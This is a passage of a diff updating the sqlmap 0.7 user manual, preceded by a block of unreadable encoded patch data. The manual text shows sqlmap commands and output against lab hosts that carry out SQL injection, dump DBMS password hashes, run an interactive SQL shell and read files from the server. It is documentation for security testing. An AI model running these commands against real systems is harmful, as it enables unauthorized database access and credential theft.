zYO%(kPMuxn4YX%=Gr)kJ8STc~fF9x78p812M!V#6aa%5vVsRYXMfk9WxEKxSq0x%< z1TGlRL!;oA5QzabM!}^b#-N8r!F3|Wpi@Sjmc+$z;4?m?DN2o226WCS80FTyD6F$v zm?*0gtXgXh6w!%H9un0vzVE=;nu2^aki$c`k|ZIHD_#P*YFJZ|$m>aR&=skWl}_Z= z5Uy#}ybS0AK1nSI9kCDyp|1v1jOW}d`hs~zvl60{s@QL_xewqOmf{ zrL@4PQmHMY^E+rvBq)h!MjXIrhc)-7YLm2^zvdQp;!lLyIMe&U_XRpm=D;0jNSE558M>k=MA!Mv$L zdL(l_NPAk=cNkZbGNl3zDA69EkV#&MUt3j3zhPW&(r`G0Xzk%v3K^|0wNNn?gxNQ3zJVN9$Jf@ zQ~}%qg$gz*eh9`Zeh82TKLjO?9|Eqx4->^LYGSU+6*WpVh=A6r6R>M1;3oVKfB}Ap ztq5A8OoX_ItP5Kj240fLX|&o1s79p7Dx44_taFx 
z4{l$PV8N3KbHxfw@Iz#aj^}e_VamEymk$u{gj6(Ov>%)1^0DEujiQv;IV%=|A6fvQ z_#v`buc1Ryj#Ra9#TnE}{`dhBH;5V%KLpfUeV}S{21r;p`Ee-EP35lz$Wpasnqqbh^FGKypk&H_K>$U6;f2eN=zpV@HEcEYBXjY zNq)ptCJUx6&;G!-{e6#c~po0{C^Q+3ozmz9O0 zBtEH_{qT=dEhd^6xLF0WtR%~yk1Mn&jDRpezQoH ziZ>TX44=xYds!;pEFuSJDtu}RZu!H-NQ$I!wMr^SA7`Z1q)QrSbi;a8t_@OYBD@a! z(>Tvk+W*mE2x2VRH0TL_TUJIC#q=TRU=~)&|7aOKCX3QRGaTniZoq#=-qKXqEb;}7 z9a6KI1Q0%zZtdAMj8u(3nMObr@8Fju;)*}HON;9C6t2ipjcR}5GnY?Qh(>JTLadIQ z%l%`aXvVgr8U``d{kCyhYyivi;RrOpEo_?)aT>YILVZTM@nM?}_35l~5huv4x*CPG z)bnGTk;YNCg>4+IP~HeC)KU;+n-67m6n@I$^wbc|iz|l%;RXnES;MGMgX0_r=7B?U z(Wy4TfVZmz^9_6JbW1m{V*1Nqq@GiGoP2JgKBGdlVdvfoW}Iy~gojZ`+OIR1i_Z5+07`NvFb<4_-ehnmI}%^Ni%)!!})xXNX)yKAD} zJXs+;AwxnIaMdjQHlA%F+Ta18Z5&$ReGs;BIA0G_!@gp~X{l$)HXp4|IWl<3g)d7! zfJh64+p;oBK!Y7$YChQJLwh>vP?5#ysc+pj4ja$>PK9k8`h+FQ=d+#fcsWklDZPBL z;sOD`m2X=i;`r?|SscDzZchyI@mJ#W@>%c`yZnlVv9(XVa(Nl~d3Iu;J!@e*?ro1P}W@TaCdcZjbxkN>M{8N3h`pk5%mHx9x6Bpaa z)Duhp*~Iats4Pw^SAZ}?cwezBAHOXli{sx~vWWx#Y3CHIri)8Xj8>u5QC6=QW1L2! z8*es^&^Gv2WMpx;0fZY9_K`aNM2UTz!9ZWHpC+X;tfA7#Bmh5UnyvV8pAWcxV0 z=%gSJZz9R`CB(BXPf(J8m7Jpm@{R5=$f`5SQ3Q(e4_w&i!>c8V*@0`_3LfAtw4!Se zTi`R#guF$E`?bo#{M%l34db95-DZ`=@uz}haay@mjhjyRn6y;Z!aD~LiAQ3kNHLCo zVoFvae|_IR4)RDgRUtvOiopb5z&+haSF)?nX3F~mj-e|*Ni5u-tlQc;+H%~h6mb3;txqk z^^xw=Io1Ns$YC$WQ>TEjS}n{>k}YtdC{#KO7J6{NzA#J-1!w+;)d2^V zBA*_(+=hev_yZvDZ^+m;f)!+wk*5GhJrt@Ro(2Ur!HiK1C(d0cJEF7jSBUK!#>oLW z`{656HiG9(W$eeba&$$`Er@&hT!7zQSas-s9{cgKi?U(JVtIu?Me-$vLlp{rg!6+6 zm5!(G?T{wVe*-QX%BZHEI0bG13QO>cs!u`6|xE< zK<-9^F{V=t6I}iZ%z?8P3W0}yy>a*rAsG0GkC@Y3*yYwUUgrv}}ilf^;C zDdPAi1oHAx{$t51;2riD6c_;~8R_xWyu$cpguhk36yXn1s1GB>ck;53>39N1R-ul+ zo-S*IKOA8n2SZTSV=Xj~Lc&2rDFhc@ofqd!o_&q88}#_BeIpns`O?9|zl!;RSAG@4 z1b>u5_&{CCtWEGAO(8oc7Ako^$pie(4%`9B)Aaq?J%jc4E}B{YOLmL86@>m6P_ zQ=lO{ex;1VjFYh+ZagKR!HXRH6WOvx6dMF^#YsLfQDNa$u}RJa_yu7@*%OU8#lAI& z;qSrm{LiaUIi8pc8oAX?or?1HPM^Y%i*GcnrB@PcJBPCTRWfUwfd2rH`17px8DRv; zCKn1T04go3aM9zAw|ptWo5|mcuy4ZxqGijDUJ#c_DeCp)pFFiIOs{$=%kpog%kp74 
z$+!UK^P8GYkyBznHs|E35*Gyd_i5}a#FnQ_NMY|VZU@W>Tz8W%dtADKG?llH>m9Ob zf|1tB7auNAK|RXL;sBwnEPR8!>am|rxKSs!SdmeoD$odjFUG!)c=1(1Gz7My-|#Kw zEi~(Nf)~feeZ(7eI91QTNMzrL2m@^f0sGE!#D^VMjbb%p%igA8Ya5jRa@OFilQIql zo_y+Pbo{eUb_7C(%KhCgs00o#3#MqdR)sM{YpT!gBS2xxgPMwjB548aN-MlaaI7oL30PwaPX*o4R!lf>Uoly=^eU!&f&hgm zxBvq~vFf!jobx7Wg6$PUk4|qd@kS$pJE~bgv*UD zwT`IMsBZ@T3pq`&DdhVgz)CiVLI4zSBP*v9T+4E31YrntBx5+5rQniZOwx3sXBFfl z1DA%}k&K2Fwi;aD3MUsv8q~-dhVZh{3RYoC-51J+73WAG`4k5Xu%!4S>vmHSnn$5t zp|#{^1k`#9Mo`Xv+yYUoNWBgcR^AgBvGT=-vWgjjQ)6<_h}+%#jR$|yB$F#_f&Wr& zc0jM`70VNrs$zWL+g0WRkdv<_U=X?C25iA^E7?y1J&t+FyK2DuX7U+?iy?AIiai3w zehlJpVoAn2EE^l;X`KX^Qwn~4JW zWJ7{Iay#7=4pK2e_*aDOsfNs#FGWll#VVn5OFr&!z~Eib!v~;aY=)XvkEzJN;BD6w z9N~(o0|%O74d5t?+)Ik32T!xSk9a@Y8YlUGkkOzREqstjF-_o7R>&%NXXSn(9Dw9s zRI~304#C>15)1aMafegB!m%5t5D)l3kKFwRFeN)51`gtzI|@kvOJ456!8W^2gD0RV zfq7F5C{@W;tZ;j((FhDt`P9J|t>jyS$j3j`Zr=vBzeEin`hW09g~D@?9!eK_mK?0nZR2;lQoK~SRscTHp1~j!|!J`X`!Gj^L zK0Wmm!Cf6xIUi8`KEUrW~d*YEDpDL5D0yBx+iP;Sn%U#0oPUF>Ed5e$;$~dKI zO$}U`f`KoHe{t4UA|Q_UirCF=L@I70P)Cw%FklA5mmup8;^b1A=2KvC#M#=J0#Jl! zh<_c)osF^+ryME0CPoB|rdbBQ%1&j&L~#zBogixUYZQt1drLMDFjl#RmN zN1S5&3UP{qbco|W#$?|gfGowxKzz%W7+O`FQ$w6$V-E+Lux~8yB;d7d+0g?~a=4B- zxlrwo;lgQh1$TkbWJ?1109EA;V+UKoacFo&K77s&AF@9RhAXP2n*j1^=_Y_8j(@Vo zp1E*{%Lf-`yNzASV{Ewd;9wEzs~{pode%z5JT+?a;RwKRE6}LBex_ z2#d!3fScigYF(iGrfe9nI+&d=!F-v<>YlHDFYLM$L>;_5wB@3vtdajs*ON9O)xMxv zBQn!LCc3Bv#JrNnkOb(2#>XyWmE?}4Ij=W2=`d7t*{bGQ(niHu0U|U((4Y~~<%==! 
for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the -page. The required version is 3.2 or above. +page. The required version is 3.2 or above, recommended is the +latest 3.3 development version from Metasploit's subversion +repository. Optionally, if you are running sqlmap on Windows, you may wish to install @@ -348,47 +350,34 @@ stand-alone executable. Download and update -

-sqlmap 0.7 release candidate 1 version can be downloaded as a - file or as a file. -

sqlmap can be downloaded from its -. +. It is available in various formats: - operating system independent. - operating system independent. - operating system independent. - architecture independent for Debian and any other Debian derivated GNU/Linux distribution. - architecture independent for Fedora and any other operating system that can install RPM packages. - that does not require the Python interpreter to be installed on the operating system. -

-Whatever way you downloaded sqlmap, run it with --update -option to update it to the latest stable version available on its -. -

You can also checkout the source code from the sqlmap @@ -406,7 +395,8 @@ sqlmap is released under the terms of the . sqlmap is copyrighted by -and . +(2007-2009) and +(2006). Usage @@ -415,7 +405,7 @@ and . $ python sqlmap.py -h - sqlmap/0.7rc1 + sqlmap/0.7 by Bernardo Damele A. G. Usage: sqlmap.py [options] @@ -498,16 +488,15 @@ Options: --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables (opt -D) --columns Enumerate DBMS database table columns (req -T opt -D) - --dump Dump DBMS database table entries (req -T, opt -D, -C, - --start, --stop) + --dump Dump DBMS database table entries (req -T, opt -D, -C) --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables - --start=LIMITSTART First table entry to dump - --stop=LIMITSTOP Last table entry to dump + --start=LIMITSTART First query output entry to retrieve + --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell @@ -635,7 +624,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:55] [INFO] testing MySQL @@ -648,7 +637,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] 
@@ -668,7 +657,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200): @@ -689,7 +678,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -709,7 +698,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200): @@ -737,7 +726,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200): @@ -1047,7 +1036,7 @@ Host: 192.168.1.125:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ Connection: close 
@@ -1063,7 +1052,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Cookie: ASPSESSIONIDSABTRCAS=469 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic @@ -1114,7 +1103,7 @@ Accept-language: en-us,en;q=0.5 Referer: http://www.google.com Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1130,7 +1119,7 @@ By default sqlmap perform HTTP requests providing the following HTTP User-Agent header value: -sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +sqlmap/0.7 (http://sqlmap.sourceforge.net)

@@ -1251,7 +1240,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M= -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1272,7 +1261,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication" nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a" -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1455,7 +1444,7 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \ - -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" + -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)" [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET [hh:mm:40] [INFO] testing connection to the target url @@ -1600,7 +1589,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
@@ -1672,7 +1661,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id= [hh:mm:50] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200): @@ -1694,7 +1683,7 @@ Content-Type: text/html [hh:mm:51] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): @@ -1716,7 +1705,7 @@ Content-Type: text/html [hh:mm:51] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): @@ -2143,7 +2132,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200): 
@@ -2324,7 +2313,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 [hh:mm:38] [INFO] testing Oracle [hh:mm:38] [INFO] confirming Oracle [hh:mm:38] [INFO] the back-end DBMS is Oracle -[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1 +[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION +WHERE ROWNUM=1 [hh:mm:38] [INFO] retrieved: 10 [hh:mm:38] [INFO] performed 20 queries in 0 seconds web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) @@ -2699,11 +2689,11 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0 [*] debian-sys-maint [1]: - password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892 + password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892 [*] root [1]: - password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B + password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B [*] testuser [1]: - password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 + password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29

@@ -2719,12 +2709,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --pas database management system users password hashes: [*] sa [1]: - password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f + password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f ba9930b62ee5d506955 header: 0x0100 - salt: 0e16d704 - mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955 + salt: 0a16d704 + mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 + uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955

@@ -2764,7 +2754,7 @@ CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1 [hh:mm:51] [INFO] performed 251 queries in 2 seconds database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96044b72d0bba108ace96d1e4 + password hash: md5d7d880f96034b72d0bba108afe96c1e7 @@ -3229,7 +3219,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3281,7 +3271,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3294,7 +3284,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "1","luther","blissett" "2","fluffy","bunny" "3","wu","ming" -"4","sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)","user agent header" +"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header" "5","","nameisnull" @@ -3322,7 +3312,7 @@ Table: users +----+----------------------------------------------+-------------------+ | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | +----+----------------------------------------------+-------------------+ 
@@ -3354,7 +3344,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3443,7 +3433,7 @@ Table: users +----+----------------------------------------------+-------------------+ | id | name | surname | +----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 2 | fluffy | bunny | | 1 | luther | blisset | | 3 | wu | ming | @@ -3663,7 +3653,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql sql> [TAB TAB] LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y' +(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) +LIMIT 0, 1)='Y' AND ORD(MID((%s), %d, 1)) > %d CAST(%s AS CHAR(10000)) COUNT(%s) @@ -3676,7 +3667,8 @@ MID((%s), %d, %d) ORDER BY %s ASC SELECT %s FROM %s.%s SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' +SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND +table_schema='%s' SELECT grantee FROM information_schema.USER_PRIVILEGES SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES SELECT schema_name FROM information_schema.SCHEMATA 
@@ -3731,10 +3723,12 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1 [hh:mm:48] [INFO] performed 55 queries in 0 seconds [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users +[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM +test.users [hh:mm:04] [INFO] retrieved: 5 [hh:mm:04] [INFO] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries +[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many +entries do you want to retrieve? [a] All (default) [#] Specific number @@ -3749,8 +3743,8 @@ ORDER BY id ASC LIMIT 0, 1 ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: luther [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: blissett [hh:mm:09] [INFO] performed 62 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
@@ -3761,8 +3755,8 @@ ORDER BY id ASC LIMIT 1, 1 ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: fluffy [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: bunny [hh:mm:09] [INFO] performed 41 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3773,8 +3767,8 @@ ORDER BY id ASC LIMIT 2, 1 ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: wu [hh:mm:09] [INFO] performed 20 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: ming [hh:mm:10] [INFO] performed 34 queries in 0 seconds SELECT * FROM test.users [3]: @@ -3799,7 +3793,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql [...] back-end DBMS: PostgreSQL -[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER +[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER sql> SELECT COUNT(name) FROM users [10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' [10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n 
@@ -3812,8 +3806,8 @@ SELECT COUNT(name) FROM users: '4' sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); [10:12:35] [INFO] testing stacked queries support on parameter 'id' [10:12:40] [INFO] the web application supports stacked queries on parameter 'id' -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) -VALUES (5, 'from', 'sql shell');' +[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users +(id, name, surname) VALUES (5, 'from', 'sql shell');' [10:12:40] [INFO] done sql> SELECT COUNT(name) FROM users [10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' @@ -3847,21 +3841,23 @@ Option: --read-file

It is possible to retrieve the content of files from the underlying file -system when the back-end database management is system is either MySQL, -PostgreSQL or Microsoft SQL Server. +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-The techniques implemented are detailed on the white paper +These techniques are detailed on the white paper .

-Example on a PostgreSQL 8.3.5 target: +Example on a PostgreSQL 8.3.5 target to retrieve a text file: -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \ - "C:\example.txt" -v2 +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \ + --read-file "C:\example.txt" -v 2 [...] [hh:mm:53] [INFO] the back-end DBMS is PostgreSQL @@ -3917,6 +3913,49 @@ $ cat output/192.168.1.121/files/C__example.txt This is a text file +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target to +retrieve a binary file: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --read-file "C:\example.exe" --union-use -v 1 + +[...] +[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing +technique +[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name' +[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql +injection vulnerability +[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter +'name' by appending a false condition after the parameter value +[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) +inband sql injection vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION +ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ' + +[hh:mm:49] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:54] [INFO] fetching file: 'C:/example.exe' +[hh:mm:54] [INFO] the SQL query provided returns 3 entries +C:/example.exe file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/ +C__example.exe' + +[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/ +192.168.1.121' + +$ ls -l output/192.168.1.121/files/C__example.exe +-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe + +$ file output/192.168.1.121/files/C__example.exe +output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit + + Write a local file on the back-end DBMS file system 
@@ -3925,69 +3964,385 @@ Options: --write-file and --dest-file

It is possible to upload a local file to the underlying file system when -the back-end database management is system is either MySQL, PostgreSQL or -Microsoft SQL Server. +the back-end database management system is either MySQL, PostgreSQL or +Microsoft SQL Server and the session user has the needed privileges to +abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

